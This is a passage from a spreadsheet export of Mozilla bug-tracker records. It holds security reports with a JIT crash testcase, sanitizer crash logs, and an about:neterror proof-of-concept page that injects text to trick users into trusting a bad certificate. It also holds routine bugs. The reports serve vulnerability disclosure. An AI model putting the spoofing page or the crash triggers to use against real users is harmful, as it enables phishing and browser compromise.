  for ( addpow = 0; addpow &lt; 33; addpow++ )
    Or( 0, 0 )
function ToInt32() {
  if (__lookupSetter__) {}
}
function ToInt32BitString( n ) {
  var b = "";
  for ( p = 30; p &gt;= 0; p-- ) {
      1 * n &gt;= Math.pow(2,p)
      b += 0; 
  }
  return b;
}
function Or(s, a) {
  ToInt32(a);
  var bs = ToInt32BitString(s);
  for ( var bit = 0; bit &lt; bs.length; bit++ ) {}
}
Backtrace:
Program received signal SIGSEGV, Segmentation fault.
js::jit::JitFrameIterator::checkInvalidation (this=&lt;optimized out&gt;, ionScriptOut=ionScriptOut@entry=0x7fffffffae30) at js/src/jit/JitFrames.cpp:163
163	    MOZ_ASSERT(ionScript-&gt;containsReturnAddress(returnAddr));
#0  js::jit::JitFrameIterator::checkInvalidation (this=&lt;optimized out&gt;, ionScriptOut=ionScriptOut@entry=0x7fffffffae30) at js/src/jit/JitFrames.cpp:163
#1  0x0000000000858a32 in js::jit::JitFrameIterator::ionScript (this=0x7fffffffb210) at js/src/jit/JitFrames.cpp:2261
#2  0x000000000085937a in js::jit::SnapshotIterator::SnapshotIterator (this=0x7fffffffaea0, iter=...) at js/src/jit/JitFrames.cpp:1707
#3  0x0000000000859e00 in js::jit::InlineFrameIterator::resetOn (this=0x7fffffffb240, iter=&lt;optimized out&gt;) at js/src/jit/JitFrames.cpp:2342
#4  0x0000000000865ba3 in js::jit::GetPcScript (cx=0x1a29b50, scriptRes=0x7fffffffb920, pcRes=0x0) at js/src/jit/JitFrames.cpp:1581
#5  0x00000000006213b1 in JSContext::currentScript (this=0x1a29b50, ppc=0x0, allowCrossCompartment=JSContext::ALLOW_CROSS_COMPARTMENT) at js/src/jscntxtinlines.h:462
#6  0x0000000000a09828 in JSContext::findVersion (this=0x1a29b50) at js/src/jscntxt.cpp:1124
#7  0x0000000000a099f0 in JS::CompileOptions::CompileOptions (this=0x7fffffffbbc0, cx=0x1a29b50, version=&lt;optimized out&gt;) at js/src/jsapi.cpp:3633
#8  0x0000000000ad5417 in js::CloneScript (cx=0x1a29b50, enclosingScope=0x0, fun=(JSFunction * const) 0x7ffff565f1c0 [object Function "__lookupSetter__"], src=0x7ffff5646128, newKind=&lt;optimized out&gt;) at js/src/jsscript.cpp:3059
#9  0x0000000000686a16 in JSRuntime::cloneSelfHostedFunctionScript (this=&lt;optimized out&gt;, cx=0x1a29b50, name=..., targetFun=(JSFunction * const) 0x7ffff565f1c0 [object Function "__lookupSetter__"]) at js/src/vm/SelfHosting.cpp:1340
#10 0x0000000000ad4018 in JSFunction::createScriptForLazilyInterpretedFunction (cx=0x1a29b50, fun=(JSFunction * const) 0x7ffff565f1c0 [object Function "__lookupSetter__"]) at js/src/jsfun.cpp:1520
#11 0x000000000041c69f in JSFunction::getOrCreateScript (this=&lt;optimized out&gt;, cx=&lt;optimized out&gt;) at js/src/shell/../jsfun.h:291
#12 0x00000000005e6cc2 in JSObject::makeLazyGroup (cx=0x1a29b50, obj=(JSObject * const) 0x7ffff565f1c0 [object Function "__lookupSetter__"]) at js/src/vm/ObjectGroup.cpp:296
#13 0x00000000004791c0 in JSObject::getGroup (this=(JSObject * const) 0x7ffff565f1c0 [object Function "__lookupSetter__"], cx=0x1a29b50) at js/src/jsobjinlines.h:96
#14 0x00000000007115f8 in js::HeapTypeSetKey::instantiate (this=0x1b311e8, cx=0x1a29b50) at js/src/vm/TypeInference.cpp:1136
#15 0x00000000007119bc in (anonymous namespace)::CompilerConstraintInstance&lt;{anonymous}::ConstraintDataFreezeObjectFlags&gt;::generateTypeConstraint(JSContext *, js::RecompileInfo) (this=0x1b311e0, cx=0x1a29b50, recompileInfo=...) at js/src/vm/TypeInference.cpp:1051
#16 0x00000000006f021e in js::FinishCompilation (cx=0x1a29b50, script=0x7ffff565d1f0, constraints=0x1b2e6d0, precompileInfo=0x7fffffffc350) at js/src/vm/TypeInference.cpp:1238
#17 0x00000000007ebdf4 in js::jit::CodeGenerator::link (this=0x7fffe4001400, cx=0x1a29b50, constraints=0x1b2e6d0) at js/src/jit/CodeGenerator.cpp:7395
#18 0x0000000000879382 in js::jit::LazyLinkTopActivation (cx=0x1a29b50) at js/src/jit/Ion.cpp:474
#19 0x00007ffff558e3f8 in ?? ()
#20 0x000000000000001f in ?? ()
#21 0x00007fffffffc680 in ?? ()
#22 0x0000000000000000 in ?? ()
rax	0x2	2
rbx	0x7ffff558e3b7	140737309631415
rcx	0xe0ff00000002e800	-2234066890152286208
rdx	0x0	0
rsi	0x7fffffffae30	140737488334384
rdi	0x7ffff5672140	140737310564672
rbp	0x7fffffffae20	140737488334368
rsp	0x7fffffffae10	140737488334352
r8	0x0	0
r9	0x0	0
r10	0x1a72648	27731528
r11	0x1b	27
r12	0x7fffffffae30	140737488334384
r13	0x7fffffffb920	140737488337184
r14	0x0	0
r15	0x7ffff558e3b7	140737309631415
rip	0x857631 &lt;js::jit::JitFrameIterator::checkInvalidation(js::jit::IonScript**) const+97&gt;
=&gt; 0x857631 &lt;js::jit::JitFrameIterator::checkInvalidation(js::jit::IonScript**) const+97&gt;:	mov    (%rcx),%rdx
   0x857634 &lt;js::jit::JitFrameIterator::checkInvalidation(js::jit::IonScript**) const+100&gt;:	mov    (%rdx),%rax
The testcase reproduces intermittently, you will have to run it a lot of times (100 should suffice to get 2-3 crashes). Marking s-s and sec-critical due to the bad address involved here.</t>
        </is>
      </c>
      <c r="X4698" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4699">
      <c r="A4699" t="n">
        <v>1253673</v>
      </c>
      <c r="B4699" t="inlineStr">
        <is>
          <t>2016-03-04 10:27:41 -0800</t>
        </is>
      </c>
      <c r="C4699" t="inlineStr">
        <is>
          <t>bypass FireFox Secure Connection Failed prompt to whitelist any site (but doesn't work)</t>
        </is>
      </c>
      <c r="D4699" t="inlineStr">
        <is>
          <t>2016-10-07 02:28:57 -0700</t>
        </is>
      </c>
      <c r="E4699" t="n">
        <v>1</v>
      </c>
      <c r="F4699" t="n">
        <v>1</v>
      </c>
      <c r="G4699" t="n">
        <v>3</v>
      </c>
      <c r="H4699" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4699" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4699" t="inlineStr">
        <is>
          <t>Networking</t>
        </is>
      </c>
      <c r="K4699" t="inlineStr">
        <is>
          <t>38 Branch</t>
        </is>
      </c>
      <c r="L4699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4699" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4699" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4699" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4699" t="inlineStr">
        <is>
          <t>[adv-main48+]</t>
        </is>
      </c>
      <c r="Q4699" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4699" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4699" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T4699" t="n">
        <v>1</v>
      </c>
      <c r="U4699" t="n">
        <v>1</v>
      </c>
      <c r="V4699" t="n">
        <v>25</v>
      </c>
      <c r="W4699" t="inlineStr">
        <is>
          <t>Created attachment 8726849
CustomMITMBypassMessages.png
User Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/48.0.2564.97 Safari/537.36
Steps to reproduce:
FireFox has an internal about: url scheme
about:downloads for example shows your downloads
In the case of a mitm attack FireFox shows a "Secure Connection Failed" allowing the user to overide if they feel safe.
The problem is that this url scheme can be modifed to let us set any custom content to trick the user into whitelisting the bad certificate.  Also possible for xss, javascript injection or one of many other about: internal url calls.
http://me6.com/mozilla/poc1.html
&lt;html&gt;
hi
&lt;script&gt;
window.addEventListener("load",function() {
	window.location= 'about:neterror?e=nssBadCert&amp;u=anything1&amp;f=anything2&amp;d=&lt;a%20id="cert_domain_link"%20title="Because of Pugs... FireFox Says This Site is super duper safe   .com."&gt;&amp;s=anythingForImage&lt;/a&gt;I know we have told you not to trust this cert but FireFox says it is safe click on the add exception below on the bottom of the page..';
});
&lt;/script&gt;
&lt;/html&gt;
Filterning is in place for about:downloads 
We will get "Error: Access to 'about:downloads' from script denied"
http://me6.com/mozilla/poc2.html
&lt;html&gt;
hi2
&lt;script&gt;
window.addEventListener("load",function() {
	window.location = "about:downloads";
});
&lt;/script&gt;
&lt;/html&gt;
I suggest FireFox implment the same Access Restrictions to many of the about: scripts used for about:downloads.
There are multiple internal security methods exposed, that external websites should not have access to load, modify, inject content into.
Wish you well on your side of the screen :)
-Eric
Actual results:
Allowed to provide custom content in fields
Expected results:
Restricted the ability to set custom content in internal pages</t>
        </is>
      </c>
      <c r="X4699" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4700">
      <c r="A4700" t="n">
        <v>1194002</v>
      </c>
      <c r="B4700" t="inlineStr">
        <is>
          <t>2015-08-12 15:42:23 -0700</t>
        </is>
      </c>
      <c r="C4700" t="inlineStr">
        <is>
          <t>Crash [@ graphite2::TtfUtil::HorMetrics]</t>
        </is>
      </c>
      <c r="D4700" t="inlineStr">
        <is>
          <t>2016-07-02 11:18:45 -0700</t>
        </is>
      </c>
      <c r="E4700" t="n">
        <v>1</v>
      </c>
      <c r="F4700" t="n">
        <v>1</v>
      </c>
      <c r="G4700" t="n">
        <v>3</v>
      </c>
      <c r="H4700" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4700" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4700" t="inlineStr">
        <is>
          <t>Graphics: Text</t>
        </is>
      </c>
      <c r="K4700" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4700" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4700" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4700" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4700" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4700" t="inlineStr">
        <is>
          <t>sec-high+ without OTS [gfx-noted][adv-main43+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q4700" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4700" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4700" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4700" t="n">
        <v>1</v>
      </c>
      <c r="U4700" t="n">
        <v>0</v>
      </c>
      <c r="V4700" t="n">
        <v>5</v>
      </c>
      <c r="W4700" t="inlineStr">
        <is>
          <t>The attached testcase crashes on graphite2 revision fa8d4398dded (run through the gr2fonttest command line utility).
Backtrace:
==28115==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61a00001f706 at pc 0x7f3bcd019dad bp 0x7fffd5cd5d40 sp 0x7fffd5cd5d38
READ of size 2 at 0x61a00001f706 thread T0
    #0 0x7f3bcd019dac in graphite2::TtfUtil::HorMetrics(unsigned short, void const*, unsigned long, void const*, int&amp;, unsigned int&amp;) /src/TtfUtil.cpp:801:16
    #1 0x7f3bccfa3f6f in graphite2::GlyphCache::Loader::read_glyph(unsigned short, graphite2::GlyphFace&amp;, int*) const /src/GlyphCache.cpp:353
    #2 0x7f3bccfa2406 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) /src/GlyphCache.cpp:139
    #3 0x7f3bccf8e304 in graphite2::Face::readGlyphs(unsigned int) /src/Face.cpp:98
    #4 0x7f3bccf2ba7b in (anonymous namespace)::load_face(graphite2::Face&amp;, unsigned int) /src/gr_face.cpp:54
    #5 0x7f3bccf2ef79 in gr_make_face_with_ops /src/gr_face.cpp:89
    #6 0x7f3bccf2ef79 in gr_make_file_face /src/gr_face.cpp:242
    #7 0x48ed05 in Parameters::testFileFont() const /gr2fonttest/gr2FontTest.cpp:618
    #8 0x49248b in main /gr2fonttest/gr2FontTest.cpp:770
    #9 0x7f3bccb6cec4 (/lib/x86_64-linux-gnu/libc.so.6+0x21ec4)
    #10 0x486c4c in _start (/build/gr2fonttest/gr2fonttest+0x486c4c)
0x61a00001f706 is located 0 bytes to the right of 1158-byte region [0x61a00001f280,0x61a00001f706)
allocated by thread T0 here:
    #0 0x46df61 in __interceptor_malloc (/build/gr2fonttest/gr2fonttest+0x46df61)
    #1 0x7f3bcd020bfe in graphite2::FileFace::get_table_fn(void const*, unsigned int, unsigned long*) /src/FileFace.cpp:90
    #2 0x7f3bccf9279f in graphite2::Face::Table::Table(graphite2::Face const&amp;, graphite2::TtfUtil::Tag, unsigned int) /src/Face.cpp:274
    #3 0x7f3bccfaa5c9 in graphite2::GlyphCache::Loader::Loader(graphite2::Face const&amp;, bool) /src/GlyphCache.cpp:248
    #4 0x7f3bccfa1211 in graphite2::GlyphCache::GlyphCache(graphite2::Face const&amp;, unsigned int) /src/GlyphCache.cpp:123
    #5 0x7f3bccf8e304 in graphite2::Face::readGlyphs(unsigned int) /src/Face.cpp:98
SUMMARY: AddressSanitizer: heap-buffer-overflow /src/TtfUtil.cpp:801 graphite2::TtfUtil::HorMetrics(unsigned short, void const*, unsigned long, void const*, int&amp;, unsigned int&amp;)
Shadow bytes around the buggy address:
  0x0c347fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c347fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=&gt;0x0c347fffbee0:[06]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c347fffbf3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28115==ABORTING
Note that this is on graphite2 trunk and without OTS in front of it. We tested this particular file and Firefox and it is rejected by OTS with:
metrics: Bad number of metrics 3617
hhea: Failed to parse horizontal metrics
hhea: Failed to parse table
However, according to cdiehl that doesn't necessarily mean that the bug cannot be reached through OTS (e.g. by fixing up the testcase enough to make it through). Marking s-s until we confirmed that this bug cannot be reached/exploited with OTS enabled.</t>
        </is>
      </c>
      <c r="X4700" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4701">
      <c r="A4701" t="n">
        <v>1440717</v>
      </c>
      <c r="B4701" t="inlineStr">
        <is>
          <t>2018-02-23 08:58:03 -0800</t>
        </is>
      </c>
      <c r="C4701" t="inlineStr">
        <is>
          <t>AddressSanitizer: heap-use-after-free [@ mozilla::gl::GLContext::MakeCurrent] with READ of size 8</t>
        </is>
      </c>
      <c r="D4701" t="inlineStr">
        <is>
          <t>2020-02-28 03:03:57 -0800</t>
        </is>
      </c>
      <c r="E4701" t="n">
        <v>1</v>
      </c>
      <c r="F4701" t="n">
        <v>1</v>
      </c>
      <c r="G4701" t="n">
        <v>3</v>
      </c>
      <c r="H4701" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4701" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4701" t="inlineStr">
        <is>
          <t>Graphics: Layers</t>
        </is>
      </c>
      <c r="K4701" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4701" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M4701" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N4701" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4701" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4701" t="inlineStr"/>
      <c r="Q4701" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4701" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S4701" t="inlineStr">
        <is>
          <t>mozilla61</t>
        </is>
      </c>
      <c r="T4701" t="n">
        <v>1</v>
      </c>
      <c r="U4701" t="n">
        <v>0</v>
      </c>
      <c r="V4701" t="n">
        <v>27</v>
      </c>
      <c r="W4701" t="inlineStr">
        <is>
          <t>Created attachment 8953518
crash.txt
Crash seen while fuzzing m-c 20180223-f7c5598e45c3, but I don't have a testcase that reproduces the issue.
==6735==ERROR: AddressSanitizer: heap-use-after-free on address 0x61e000161918 at pc 0x000109286765 bp 0x70000f46d600 sp 0x70000f46d5f8
READ of size 8 at 0x61e000161918 thread T34
    #0 0x109286764 in mozilla::gl::GLContext::MakeCurrent(bool) const (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x27e6764)
    #1 0x10943dc35 in mozilla::layers::CompositingRenderTargetOGL::~CompositingRenderTargetOGL() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x299dc35)
    #2 0x10943de9d in mozilla::layers::CompositingRenderTargetOGL::~CompositingRenderTargetOGL() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x299de9d)
    #3 0x10969c844 in mozilla::layers::ContainerLayerComposite::~ContainerLayerComposite() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2bfc844)
    #4 0x10969ca6d in mozilla::layers::ContainerLayerComposite::~ContainerLayerComposite() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2bfca6d)
    #5 0x109364301 in mozilla::layers::ContainerLayer::RemoveChild(mozilla::layers::Layer*) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x28c4301)
    #6 0x10969c7b1 in mozilla::layers::ContainerLayerComposite::~ContainerLayerComposite() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2bfc7b1)
    #7 0x10969ca6d in mozilla::layers::ContainerLayerComposite::~ContainerLayerComposite() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2bfca6d)
    #8 0x109364301 in mozilla::layers::ContainerLayer::RemoveChild(mozilla::layers::Layer*) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x28c4301)
    #9 0x10969c7b1 in mozilla::layers::ContainerLayerComposite::~ContainerLayerComposite() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2bfc7b1)
    #10 0x10969ca6d in mozilla::layers::ContainerLayerComposite::~ContainerLayerComposite() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2bfca6d)
    #11 0x10976b77a in mozilla::layers::LayerTransactionParent::~LayerTransactionParent() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2ccb77a)
    #12 0x10976ba94 in non-virtual thunk to mozilla::layers::LayerTransactionParent::~LayerTransactionParent() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2ccba94)
    #13 0x10973ce2e in mozilla::layers::CrossProcessCompositorBridgeParent::DeallocPLayerTransactionParent(mozilla::layers::PLayerTransactionParent*) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2c9ce2e)
    #14 0x10855844f in mozilla::layers::PCompositorBridgeParent::RemoveManagee(int, mozilla::ipc::IProtocol*) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x1ab844f)
    #15 0x107f16c63 in mozilla::layers::PLayerTransactionParent::Send__delete__(mozilla::layers::PLayerTransactionParent*) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x1476c63)
    #16 0x10976c201 in mozilla::layers::LayerTransactionParent::RecvShutdown() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2ccc201)
    #17 0x107f19af6 in mozilla::layers::PLayerTransactionParent::OnMessageReceived(IPC::Message const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x1479af6)
0x61e000161918 is located 1176 bytes inside of 2640-byte region [0x61e000161480,0x61e000161ed0)
freed by thread T34 here:
    #0 0x103223b4d in wrap_free (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/libclang_rt.asan_osx_dynamic.dylib:x86_64+0x58b4d)
    #1 0x1094aca05 in mozilla::layers::TextureImageTextureSourceOGL::~TextureImageTextureSourceOGL() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2a0ca05)
    #2 0x1097053bf in mozilla::layers::ShmemTextureHost::~ShmemTextureHost() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2c653bf)
    #3 0x1097055fd in mozilla::layers::ShmemTextureHost::~ShmemTextureHost() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2c655fd)
    #4 0x1093dae51 in mozilla::AtomicRefCountedWithFinalize&lt;mozilla::layers::TextureHost&gt;::Release() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x293ae51)
    #5 0x1097422cb in mozilla::layers::ParentActor&lt;mozilla::layers::PTextureParent&gt;::RecvDestroy() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2ca22cb)
    #6 0x1081967db in mozilla::layers::PTextureParent::OnMessageReceived(IPC::Message const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x16f67db)
    #7 0x108572598 in mozilla::layers::PCompositorManagerParent::OnMessageReceived(IPC::Message const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x1ad2598)
    #8 0x107c3d8c7 in mozilla::ipc::MessageChannel::DispatchAsyncMessage(IPC::Message const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x119d8c7)
previously allocated by thread T34 here:
    #0 0x103223993 in wrap_malloc (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/libclang_rt.asan_osx_dynamic.dylib:x86_64+0x58993)
    #1 0x1025841bd in moz_xmalloc (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/libmozglue.dylib:x86_64+0x21bd)
    #2 0x109338c07 in mozilla::gl::GLContextProviderCGL::CreateForWindow(nsIWidget*, bool, bool) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2898c07)
    #3 0x10933888a in mozilla::gl::GLContextProviderCGL::CreateForCompositorWidget(mozilla::widget::CompositorWidget*, bool) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x289888a)
    #4 0x109440e7f in mozilla::layers::CompositorOGL::CreateContext() (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x29a0e7f)
    #5 0x109441c13 in mozilla::layers::CompositorOGL::Initialize(nsTString&lt;char&gt;*) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x29a1c13)
    #6 0x10972d5e8 in mozilla::layers::CompositorBridgeParent::NewCompositor(nsTArray&lt;mozilla::layers::LayersBackend&gt; const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2c8d5e8)
    #7 0x10972cb49 in mozilla::layers::CompositorBridgeParent::InitializeLayerManager(nsTArray&lt;mozilla::layers::LayersBackend&gt; const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2c8cb49)
    #8 0x10972dc7f in mozilla::layers::CompositorBridgeParent::AllocPLayerTransactionParent(nsTArray&lt;mozilla::layers::LayersBackend&gt; const&amp;, unsigned long long const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x2c8dc7f)
    #9 0x10855d2a3 in mozilla::layers::PCompositorBridgeParent::OnMessageReceived(IPC::Message const&amp;) (/Users/truber/builds/asan/Nightly.app/Contents/MacOS/XUL:x86_64+0x1abd2a3)</t>
        </is>
      </c>
      <c r="X4701" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="4702">
      <c r="A4702" t="n">
        <v>1499131</v>
      </c>
      <c r="B4702" t="inlineStr">
        <is>
          <t>2018-10-15 10:28:08 -0700</t>
        </is>
      </c>
      <c r="C4702" t="inlineStr">
        <is>
          <t>socorro deploy: 343</t>
        </is>
      </c>
      <c r="D4702" t="inlineStr">
        <is>
          <t>2018-10-15 11:35:30 -0700</t>
        </is>
      </c>
      <c r="E4702" t="n">
        <v>1</v>
      </c>
      <c r="F4702" t="n">
        <v>1</v>
      </c>
      <c r="G4702" t="n">
        <v>4</v>
      </c>
      <c r="H4702" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I4702" t="inlineStr">
        <is>
          <t>Socorro</t>
        </is>
      </c>
      <c r="J4702" t="inlineStr">
        <is>
          <t>Infra</t>
        </is>
      </c>
      <c r="K4702" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L4702" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M4702" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N4702" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O4702" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4702" t="inlineStr"/>
      <c r="Q4702" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R4702" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S4702" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T4702" t="n">
        <v>1</v>
      </c>
      <c r="U4702" t="n">
        <v>0</v>
      </c>
      <c r="V4702" t="n">
        <v>3</v>
      </c>
      <c r="W4702" t="inlineStr">
        <is>
          <t>We want to do a Socorro -prod deploy today tagged 343.
It consists of the following:
(current tag: 342 - c4bea61)
6636045: bug 1493768: redo webapp to use BugAssociation Django model (willkg)
45a6cb0: bug 1493768: fix ordering of /api/Bugs results (willkg)
74f773c: bug 1493768: remove old model and references to it (willkg)
96cf15e: bug 1493768: add BugAssociationAdmin (willkg)
6bc50c7: bug 1498441: create Platform Django model and migration script (willkg)
5fcfbf7: Fixes bug 1495966 - add core::ptr::drop_in_place to prefix signature list (#4629 (heycam)
(next tag: 343 - 5fcfbf7)
After this, we need to run the platforms data migration script.</t>
        </is>
      </c>
      <c r="X4702" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4703">
      <c r="A4703" t="n">
        <v>14319</v>
      </c>
      <c r="B4703" t="inlineStr">
        <is>
          <t>1999-09-19 23:01:21 -0700</t>
        </is>
      </c>
      <c r="C4703" t="inlineStr">
        <is>
          <t>Cannot set bugzilla target-milestone combobox</t>
        </is>
      </c>
      <c r="D4703" t="inlineStr">
        <is>
          <t>1999-10-22 16:07:32 -0700</t>
        </is>
      </c>
      <c r="E4703" t="n">
        <v>1</v>
      </c>
      <c r="F4703" t="n">
        <v>1</v>
      </c>
      <c r="G4703" t="n">
        <v>3</v>
      </c>
      <c r="H4703" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I4703" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J4703" t="inlineStr">
        <is>
          <t>Layout: Form Controls</t>
        </is>
      </c>
      <c r="K4703" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L4703" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M4703" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N4703" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O4703" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P4703" t="inlineStr"/>
      <c r="Q4703" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R4703" t="inlineStr">
        <is>
          <t>blocker</t>
        </is>
      </c>
      <c r="S4703" t="inlineStr">
        <is>
          <t>M10</t>
        </is>
      </c>
      <c r="T4703" t="n">
        <v>1</v>
      </c>
      <c r="U4703" t="n">
        <v>0</v>
      </c>
      <c r="V4703" t="n">
        <v>15</v>
      </c>
      <c r="W4703" t="inlineStr">
        <is>
          <t>linux &amp; WinNT, apprunner.
Visit any bug, how about
  http://bugzilla.mozilla.org/show_bug.cgi?id=4076
I can't set the target-fix milestone combobox!
Other comboboxes work, it looks like ? the short-named ones
aren't working.</t>
        </is>
      </c>
      <c r="X4703" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="4704">
      <c r="A4704" t="n">
        <v>454363</v>
      </c>
      <c r="B4704" t="inlineStr">
        <is>
          <t>2008-09-08 23:50:51 -0700</t>
        </is>
      </c>
      <c r="C4704" t="inlineStr">
        <is>
          <t>Arbitrary code execution using FeedWriter.onPageChanged() method</t>
        </is>
      </c>
      <c r="D4704" t="inlineStr">
        <is>
          <t>2018-12-20 14:42:01 -0800</t>
        </is>
      </c>
      <c r="E4704" t="n">
        <v>1</v>
      </c>
      <c r="F4704" t="n">
        <v>1</v>
      </c>
      <c r="G4704" t="n">
        <v>6</v>
